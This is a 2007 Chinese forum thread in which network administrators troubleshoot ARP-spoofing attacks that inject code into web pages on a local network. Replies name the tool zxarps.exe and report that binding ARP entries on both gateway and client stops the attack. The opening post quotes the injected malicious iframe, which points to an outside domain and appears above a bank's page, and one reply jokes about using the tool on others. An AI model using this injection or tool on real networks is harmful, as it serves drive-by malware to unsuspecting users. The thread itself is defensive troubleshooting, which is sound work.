网页所谓arp挂马的问题

fg0000

现在arp欺骗不仅用来窃听数据，还主动攻击。
现在访问任意网页，都被插入一段代码
打开网页源文件
<iframe src='http://www.ghghjh.cn/www1.htm' width=100 height=100></iframe>                                                                                                                                                                    
       
  


<html>  
<head>
<meta content="text/html; charset=gb2312" http-equiv="Content-Type">
<title>中国农业银行</title>
<link href="../../../../wwwroot/css/cn/hq/main.css" type="text/css" rel="stylesheet">

………………
我已绑定网关ip，mac地址
发现有伪装网关的mac地址
不知他是怎么插入代码的，科来工程包太大，传不上来

[ 本帖最后由 fg0000 于 2007-12-14 16:03 编辑 ]

xuhl196

是做的双向绑定么？

fg0000

是做的双向绑定。。。

数据我来抓

应该使用的是zxarps.exe这类的arp攻击程序，只要攻击开始，该广播域内的计算机上网都会被插入一段代码，该代码可以自定义，曾经模拟测试过 ，其实就是挂马

tbage

这种arp欺骗需要winpcap支持？

局域网内一般都不会让人安装这个东东的...据说可以免疫``

chinaheiyu

原帖由 xuhl196 于 2007-12-14 17:19 发表
是做的双向绑定么？

双向绑定？？有什么好处，，，，

逍遥一指令

双向绑定可以用来防范ARP攻击

fg0000

用科来分析下，确实是中毒的机子发来的数据包，不明白的是我用arp -s 网关mac地址 ip 地址已经绑定正确的网关，又安了arp防火墙，arp 缓存里面没有表项，还是中招

fg0000

研究报告zxarps.exe

.原理： 依然是arp欺骗，需要winpcap支持
主要功能：欺骗客户机并对客户机浏览网页插入代码！

结果：

1，客户机绑定网关，网关不做处理，欺骗有效，插入代码有效。

2，网关绑定客户机，客户机不做处理，插入代码无效，但客户机被欺骗成功，zxarps关闭时掉线。

3，双绑，欺骗无效，插入代码无效。

总结双绑依然是对付arp最有效的。

我属于第一种情况，上交换机上看了下，就是中毒机子的ip mac没绑定，不知怎么搞得。

数据我来抓

软件都找到了，这下你可以去折磨别人了，哈哈

naboo

不管理措施如何完善（自认完善），还是有人天天中毒。。。（机关）